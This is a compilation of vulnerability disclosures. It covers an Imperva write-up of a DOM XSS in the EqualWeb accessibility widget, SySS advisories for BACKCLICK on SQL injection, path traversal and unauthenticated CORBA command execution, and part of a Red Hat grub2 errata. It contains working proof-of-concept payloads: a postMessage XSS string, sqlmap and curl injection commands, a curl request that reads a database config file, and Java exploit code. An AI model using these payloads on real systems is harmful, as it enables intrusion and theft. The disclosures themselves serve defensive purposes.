EqualWeb Accessibility Widget 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.1.10, 3.0.0, 3.0.1, 3.0.2, 4.0.0, and 4.0.1 allows DOM XSS due to improper validation of message events to accessibility.js.

The Americans with Disabilities Act (ADA) includes requirements on companies falling within its scope to ensure their websites are accessible to individuals with disabilities. These requirements have created a strong incentive for companies to use third-party solutions in the form of JavaScript libraries to make their websites accessible. However, using third-party solutions comes with its own risks.

Recently, Imperva’s vulnerability research team uncovered a DOM XSS vulnerability in certain versions of a popular accessibility widget by EqualWeb. We would like to emphasize that we did not find this vulnerability in the latest version of EqualWeb’s accessibility widget and only found the vulnerability in older versions that are specified at the end of this post.

**Successful exploitation of this vulnerability could allow malicious actors to impersonate a user and take over a user’s account, perform any action on behalf of the user and or steal sensitive information such as cookies and session tokens.**

According to the EqualWeb website, the EqualWeb accessibility widget is being used by many popular companies and websites such as IronSource, Fiverr, Gett, Bosh, Playtika, Zara, YOT PO and AVIS, as well as financial institutions and public sector and nonprofit entities.

In this post, we will go over the vulnerability, explain how it was detected and what you can do to manage your third-party risks better.

****What is DOM-based XSS?****

DOM-based XSS vulnerabilities occur when JavaScript uses data from an attacker-controllable source, such as the URL or untrusted message event, and passes it to a method or an API that supports dynamic code execution, such as innerHTML or eval.

DOM-based XSS vulnerabilities are notoriously hard to detect and prevent because they involve the manipulation of the Document Object Model (DOM) rather than the source code of the application. The attacker’s input may not be reflected in the source code, and may only be triggered under certain externally-controllable circumstances, such as post-message events.

****Identifying the threat****

One of the most common recommendations regarding XSS prevention is to sanitize user input. With that said, some user inputs are harder to spot, which makes them the perfect place to hunt for vulnerabilities.

One of the most overlooked input sources is the browser post-message API.

The post-message API allows for cross-origin communication. This means that a malicious script on one domain can send messages to a script on another domain. These messages can be used to bypass restrictions that the browser has in place to prevent cross-origin communication.

If a website does not properly validate and sanitize messages that are received through the post-message API, it is sometimes possible for an attacker to inject malicious code into the website. This code can then be executed by the website, leading to a range of potential consequences, such as the theft of sensitive information or the execution of unwanted actions on behalf of the user.

****Understanding the post-message API****

To identify whether a website can be exploited using the post-message API, we need to understand how it works. The post-message API uses the browser’s “message” event. This event is fired when a message is received by a window or a frame. The message event has two properties that are relevant to us:

– **data**: The message that was sent

– **origin**: The origin of the message

To receive messages, the website needs to register an event listener for the message event, which looks something like this:

window.addEventListener('message', function(event) {
document.body.innerHTML = event.data;
});

Once the site registered the event listener, it will start receiving messages. These messages can be sent by other scripts on the same domain or by scripts on other domains. If we want to send a message, we can use the postMessage function. This function takes two arguments:

– **data**: The message that will be sent

– **targetOrigin**: The origin of the window or frame that will receive the message

The following code demonstrates how to send a message:

var target = window.open(“https://example.com”);
target.postMessage(“Hello”, “https://example.com”);

This message will result in the word “Hello” being written to the screen.

However, as you probably noticed, our event listener has 2 main security issues.

1.  We do not validate the message origin, which means any website can send messages to our event listener which could lead to some unintended consequences.
2.  We write unsanitized input to the website DOM by setting the document.body.innerHTML property.

****Exploring “message” event handlers on any site****

A quick way to find “message” event listeners on any website is to use the “getEventListeners” method from the devtools console; this method returns event listeners of the given object.

We can simply give it the window object, and look for “message” event listeners like so:

getEventListeners(window)
.message.map(e => e.listener)
.map(console.log);

The code above will go over each event listener and print it to the console, you can now click on each listener from the console to jump to the method definition.

****The vulnerability****

The EqualWeb widget registered a few “message” event listeners, none of which checks if a message was sent from an allowed source. This means any cross-origin site can send messages to those listeners.

While reading each message event listener, the following code was discovered.

window.addEventListener("message", function(i) {
       try {
           const n = e.a11y.GetMsgData(i.data);
           let s = document.querySelectorAll(\`iframe\[src\]:not(\[src^="javascript"\])\`);
           e.isIframe && !s || !n || "isNagichOnTop" !== n.INDmessage || t(s, "isNagichOnTop"),
           "getIndModes" === n.INDmessage && t(s, e.mode),
           (e.a11y.validMethods\[n.optName\] &&
               e.a11y.validMethods\[n.optName\] == n.method ||
               "INDactivate" === n.INDmessage ||
               "INDactivate" === n.command) && e.LoadData((function() {
                   var t = e\[n.method\];
                   "function" == typeof t && t(n.data ? n : n.optName)
               }
           ))
       } catch (e) {
           this.INDLog(e, "err")
       }
}

As you can see we have a lot of elaborate checks before reaching what seems to be an interesting piece of code. We started by checking if exploitation is even possible under the best-case scenario. So for now, we are ignoring all the other checks and just focusing on the highlighted section.

The variable “n” holds our message payload, and as you can see, it is used to access a property of the variable “e”, the code then checks that the property is a function and execute it with “n” or “n.optName” as the first argument which is also under our control.

This looks promising, but it all comes down to what methods are there in the “e” variable. Let’s take a look, we wrote this short script to only show the methods in the “e” variable that receives at least one argument.

for (let key in e){
   if (typeof e\[key\] !== "function"){ continue; }
   if (e\[key\].toString().indexOf('function()') === 0){ continue; }
   console.log(key,e\[key\]);
}

After doing that we had 83 methods to review, after going through about 20 we found the one. The _getBlock_ method.

e.getBlock = function(e) {
   let t = $IND(e).parents(".INDblock");
   return $IND(t\[t.length - 1\]).data("INDblock")
}

This method takes one argument “e” and passes it to $IND which turns out to be  jQuery, which is very helpful since jQuery selector evaluates HTML tags automatically leading to XSS.

Now that we know exploitation is possible, let’s check if we can reach the vulnerable code.

(e.a11y.validMethods\[n.optName\] &&
               e.a11y.validMethods\[n.optName\] == n.method ||
               "INDactivate" === n.INDmessage ||
               "INDactivate" === n.command)

The conditions above have to evaluate to true for the vulnerable code to be reached. At first glance it seems n.optName is checked against an allow list, optName is required for our exploit to work. However, when looking closer, the condition itself seems to ignore all of that  if _n.INDmessage_ or _n.command_ is equal to _“INDactivate”_.

Let’s test it. We pasted the following code in the devtools console, where a vulnerable version of the EqualWeb Javascript code is running.

postMessage(JSON.stringify({"command": "INDactivate", "method": "getBlock", "optName": "<img src='ftp:' onerror=alert(1) >"}))

A few seconds later an alert message appears. To make sure the attack is feasible, w We then confirm messages can be sent from a different domain.

****Third-party risk management****

As reflected above, companies should be aware of the risks associated with using third-party solutions.

Third-party risk management is the process of identifying, assessing, and mitigating risks associated with using third-party products and services.

As part of third-party risk management, companies should:  
– Identify all the third-party products and services they are using  
– Assess the risks associated with each third-party product and service  
– Mitigate the risks by implementing security controls  
– Continuously monitor the third-party products and services for risks

**Imperva’s Client-Side Protection** can help companies mitigate the risks associated with using third-party products and services by continuously monitoring all JavaScript services and only allowing pre-approved services to execute. This means that any new JavaScript services or changes are blocked until authorized, and if any JavaScript code is poisoned/exploited and attempts to send data elsewhere, your security team will be the first to know.

****Just-in-time widgets****

Almost all third-party libraries/widgets execute by default for all visitors; in some cases, this is necessary, for example when collecting analytics. However, it’s not clear why widgets for things like accessibility or chat have to be loaded for all visitors.

In general, most of your visitors would not use the chat/accessibility widgets while using the site. With a few lines of code, any developer can make it so that only once the user interacts with the floating chat/accessibility widget the library code will be executed.

It may be a bit slower for the site visitors who choose to use the widget, but from a security point of view, your site attack surface is greatly reduced. If we take the EqualWeb case as an example, sites that utilize this approach would render this attack almost useless since users would have to use the widget before the vulnerability could be exploited.

**We recommend that when possible, providers should implement this kind of architecture by default.**

****IOCs****

**Vulnerable EqualWeb Accessibility widget versions:**

*   2.0.0
*   2.0.1
*   2.0.2
*   2.0.3
*   2.0.4
*   2.1.10
*   3.0.0
*   3.0.1
*   3.0.2
*   4.0.0
*   4.0.1

Please note, while it is possible other versions of the widget include the DOM XSS vulnerability, those versions listed above were the only ones we confirmed to be vulnerable. Versions above 4.0.1 and the latest version seem to be unaffected.

**Hostnames:**  

*   aacdn.nagich.com
*   js.nagich.co.il
*   cdn.equalweb.com
*   cdn.uirix.com

**Try Imperva for Free**

Protect your business for 30 days on Imperva.

Start Now

CVE-2022-42960: New Vulnerability in Popular Widget Shows Risks of Third-Party Code | Imperva

An issue was discovered in BACKCLICK Professional 5.9.63. Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-029 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44003 Author of Advisory: Jannik Vieten, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When SQL queries are constructed, user-controlled parameters are inserted in an insecure manner. Attackers can exploit this by injecting SQL syntax into parameters to influence the query executed by the database. This can be utilized to retrieve all data stored within the database. The vulnerability exists at various locations within the application. This indicates a structural or architectural problem of BACKCLICK's construction of SQL queries. Confer the "Proof of Concept" section below for exemplary incarnations of the issue. In order to prevent such vulnerabilities, user-controlled parameters must be considered potentially malicious. When constructing database queries, parameters need to be inserted securely in order to render injected SQL syntax harmless. The use of prepared statements with parameterized queries is a method that can be used to accomplish this (see \[4\]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following examples show locations where SQL injection was possible. This list is not intended to be exhaustive. The search function within the management interface at "Abonnenten - Verwaltung" > "Test-Verteiler" can be exploited using the tool sqlmap (see \[5\]): sqlmap.py --cookie JSESSIONID=\[...session id...\] -u 'https://example.com/bc/servlet/gui.bc\_rob\_positiv?idx=1&action=1&min=0&PATTERN=\*&HPS=50' --dbms mysql --level 5 --risk 3 A similar vulnerability is also exploitable by unauthenticated remote attackers. Here, the payload for a UNION-based injection is within a base64-encoded URL parameter: curl -k -i 'https://example.com/bc/servlet/web.announcements?dHlwZT0wJm1pZD0wJmxheW91dD0xJmlkPWEnIEFORCAxPTAgVU5JT04gU0VMRUNUIChTRUxFQ1Qgc3Vic2NyaWJlcl9lbWFpbCBGUk9NIHN1YnNjcmliZXJzIExJTUlUIDEpLCAxIC0tICZwcmV2aWV3PTE;1;1;' This corresponds with the following UNION-based injection: type=0&mid=0&layout=1&id=a' AND 1=0 UNION SELECT (SELECT subscriber\_email FROM subscribers LIMIT 1), 1 -- &preview=1 The server's response contains the extracted data (here: an e-mail address) in the "Location" header of the HTTP response: HTTP/1.1 500 500 Date: Wed, 11 May 2022 13:46:11 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=...; Path=/bc; Secure; HttpOnly Location: jane.doe@example.org&bc1=1&bc2=1 Content-Length: 1181 Connection: close Content-Type: text/html;charset=UTF-8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-029 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-029.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] OWASP SQL Injection Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.html \[5\] Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jannik Vieten of SySS GmbH. E-Mail: jannik.vieten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Jannik\_Vieten.asc Key ID: 0xC3366ECBE2C70C423ECFC123858221C952002FFB Key Fingerprint: C336 6ECB E2C7 0C42 3ECF C123 8582 21C9 5200 2FFB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwzZuy+LHDEI+z8EjhYIhyVIAL/sFAmNk1xQACgkQhYIhyVIA L/saYQ/+LM3NsGrRo+ohC5YmL4oRY+oLXas6gXpRV6ltKPhQK64ErCtXAFQric/C q/7t7fP1tzm1LJzRV3Xf9F1OvLiRlE6ItQZeU75uTdBF/JwUl/Hqm5baCZTcbuH8 oQFw2pAVxSbphrlW9OdeiTsr5P4jVcb3MUQWhBiUq7aofr/vrHIBuBU4iP1ehz6A +6aDAdTqNmDmRTBVOoLQYuMccel4EGvUgTeFvcNCjSWhhhuEB9MCmNEHXDrUl9yi gDHzHKtIurpt2FWabc2flblL8IRLAP7z6QG4/kMPTbfuK0YUOISfO++4+UHMOUQ2 92/AMbZESMe0O26rHbnXNdygVR/FMQRFINurMcuLbb0gJtEqJXnpFJGCZ9ByeFRJ syNrjpdgaV1JwqQuJR9MBM4Fgo8rseFSQQVIGVaVMZOXkzDrFBJZMgxxpqGWx8jL HMcnmhVTEdsz6qjAHNT+hJZ8WWwJksO4RPgtpPB6lF1suaWHn7ZWzN4dUKe7DErt 6fEXFSkf1t3H8vVJLSSihyJwxO+hyVOHVBKN6NZaO/NMTLMZ+mzJjGFsC7wujrEP SziBzPxvelWKfJVKLUsbWHVr66g8T73wUVfJwNkS8ExFqUQ5HWZCOOL0nTgESPL8 vaZxzWhcPnCc9oVq6I8TuurSDQ8w3Vh2UzK3SGx+Wh5CPJy5EaU= =/w+N -----END PGP SIGNATURE-----

CVE-2022-44003

An issue was discovered in BACKCLICK Professional 5.9.63. Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-037 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-23: Relative Path Traversal Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44008 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Asset files are delivered using an error handler for HTTP 404 through ImageDisplayServlet. While a check for directory traversal is in place, URL decoding is performed after that check. The check can therefore be bypassed by URL-encoding the desired path components. Due to encoding normalization, this issue did not appear to be exploitable when the host is accessed through the Apache reverse proxy. However, the Tomcat listener is also reachable over the network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The database configuration file can be retrieved over Tomcat's HTTP interface, for example using curl: - ----- $ curl --path-as-is http://:8080/bc/assets/%2e%2e/META-INF/db-config.xml mysql\_innodb \[...\] 3306 backclick \[...\] - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-037 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-037.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoJ1ggAp0bPh2PGp6ZAKXsvWD8wRPc65xwvLVTXlgAP+xarIXb5O87o57MzsxjK R66hrkN2KpyF61xAHNTEhXKitt8BKmEQAUl2ZgrB/jWj2QEllR74Iyw13msok6CR 7lHcE3MdU/6lSaddRnXIMZ1oW6rGdf9Co8zNorRx9OC1mnp42rvTPDs+66jxbX4b Qs5SaMWnahk4LOf6Zpprjv1dHokaO1xpcCnQTocb1Dhie+d956EGPwoflwmepgXQ cjSoOmrOdKMTLwdvFiH/Pgm0Kg8p9NhmrkuubgmfLVwIWdhTMlS5koaiIDeDymSc 06h1kPOPw/ksj4fYolvWi+QjYjldAQ== =fyIi -----END PGP SIGNATURE-----

CVE-2022-44008

An issue was discovered in BACKCLICK Professional 5.9.63. Due to exposed CORBA management services, arbitrary system commands can be executed on the server.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-034 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-306: Missing Authentication for Critical Function Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-43999 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to exposed CORBA management services, arbitrary system commands can be executed on the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Alongside the CORBA services internally used by the application, an implementation repository (IMR) service is exposed on port 65501. The initial object reference (IOR) required to address the service is predictable. That service allows dynamic activation of additional servers without authentication. An arbitrary system command can be specified for the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following Java exploit code uses the JacORB client library to invoke the IMR service, register and start a new server instance. The command line to be invoked can be specified. - ----- System.setProperty("org.omg.CORBA.ORBClass", "org.jacorb.orb.ORB"); System.setProperty("org.omg.CORBA.ORBSingletonClass", "org.jacorb.orb.ORBSingleton"); if ( args.length < 3 ) { System.out.println("ExploitJacorbIOR \[ \[\]\]"); return; } String ip = args\[0\]; short port = (short) Integer.parseInt(args\[1\]); StringBuilder cmd = new StringBuilder(args\[2\]); for ( int i = 3; i < args.length; i++ ) { cmd.append(' '); cmd.append(args\[i\]); } // sane defaults String host = "localhost"; String key = "the\_ImR/ImRPOA/ImR"; org.omg.CORBA.ORB orb = org.omg.CORBA.ORB.init(new String\[0\], null); // create suitable IOR IOR ior = new IOR(); ior.type\_id = "IDL:org/jacorb/imr/ImplementationRepository:1.0"; CDROutputStream cds = (CDROutputStream) orb.create\_output\_stream(); cds.beginEncapsulatedArray(); ProfileBody\_1\_1 body = new ProfileBody\_1\_1(); body.iiop\_version = new Version((byte)1,(byte)2); body.host = ip; body.port = (short)port; body.object\_key = key.getBytes(StandardCharsets.UTF\_8); body.components = new TaggedComponent\[0\]; ProfileBody\_1\_1Helper.write (cds, body); ior.profiles = new TaggedProfile\[\] { new TaggedProfile(TAG\_INTERNET\_IOP.value, cds.getBufferCopy()) }; String createdIOR = new ParsedIOR( (org.jacorb.orb.ORB)orb, ior).getIORString(); // dereference IOR Properties props = new Properties(); props.setProperty("ORBInitRef.ImplementationRepository", createdIOR); props.setProperty("jacorb.use\_imr", "on"); orb = org.omg.CORBA.ORB.init((String\[\])args, props); Admin admin = AdminHelper.narrow(orb.resolve\_initial\_references("ImplementationRepository")); // use service to register and start server HostInfo\[\] hosts = admin.list\_hosts(); if ( hosts.length > 0 ) { host = hosts\[0\].name; } try { ServerInfo i = null; try { i = admin.get\_server\_info("Exploit"); } catch( UnknownServerName e) {} if ( i != null ) { admin.unregister\_server("Exploit"); } admin.register\_server("Exploit", cmd.toString(), host); } catch ( Exception e ) { e.printStackTrace(); } admin.start\_server("Exploit"); admin.unregister\_server("Exploit"); - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-034.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoUcQgAmkLcYECw1WDOxDBfpVXz0ILf+nHb7BsNN4/j7Djv5e9suWItHReNzjUV hqHnZ04Fc5HEkv0gH3DNHd9BxrcI7OirOVaJc9knOBKF2fWLBhnm5TDffzO1axqt 4c/LA6SDmLCJZleAQr6L6/0SgJnsqwnsJcRQEdKKPzgLqSd6jSYJjCNhDm6hQ7Nr skRqhRl/l4bnQjSxOeNmmV+eh96YwvnLVOyszpG+P7f35x7GqoA4PGDJhHGcRGoD oNzPg+g9XkjEIO9I4aRjUswvkFiMnRvfRp97Dk5k2SFb3gD7mTFDEG4bjoIGJp2y lug968BHANY+Iy0HRNCOGN8ka7yYOQ== =XTDQ -----END PGP SIGNATURE-----

CVE-2022-43999

Red Hat Security Advisory 2022-8494-01 - The grub2 packages provide version 2 of the Grand Unified Boot Loader, a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. Issues addressed include buffer overflow, bypass, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: grub2 security update  
Advisory ID:       RHSA-2022:8494-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8494  
Issue date:        2022-11-16  
CVE Names:         CVE-2022-2601 CVE-2022-3775  
====================================================================  
1. Summary:

An update for grub2 is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, noarch, ppc64le, x86_64

3. Description:

The grub2 packages provide version 2 of the Grand Unified Boot Loader  
(GRUB), a highly configurable and customizable boot loader with modular  
architecture. The packages support a variety of kernel formats, file  
systems, computer architectures, and hardware devices.

Security Fix(es):

* grub2: Buffer overflow in grub_font_construct_glyph() can lead to  
out-of-bound write and possible secure boot bypass (CVE-2022-2601)

* grub2: Heap based out-of-bounds write when redering certain unicode  
sequences (CVE-2022-3775)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2112975 - CVE-2022-2601 grub2: Buffer overflow in grub_font_construct_glyph() can lead to out-of-bound write and possible secure boot bypass  
2138880 - CVE-2022-3775 grub2: Heap based out-of-bounds write when redering certain unicode sequences

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
grub2-2.02-87.el8_1.11.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_1.11.aarch64.rpm  
grub2-debugsource-2.02-87.el8_1.11.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_1.11.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_1.11.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.11.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_1.11.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_1.11.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_1.11.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_1.11.noarch.rpm  
grub2-pc-modules-2.02-87.el8_1.11.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_1.11.noarch.rpm

ppc64le:  
grub2-debuginfo-2.02-87.el8_1.11.ppc64le.rpm  
grub2-debugsource-2.02-87.el8_1.11.ppc64le.rpm  
grub2-ppc64le-2.02-87.el8_1.11.ppc64le.rpm  
grub2-tools-2.02-87.el8_1.11.ppc64le.rpm  
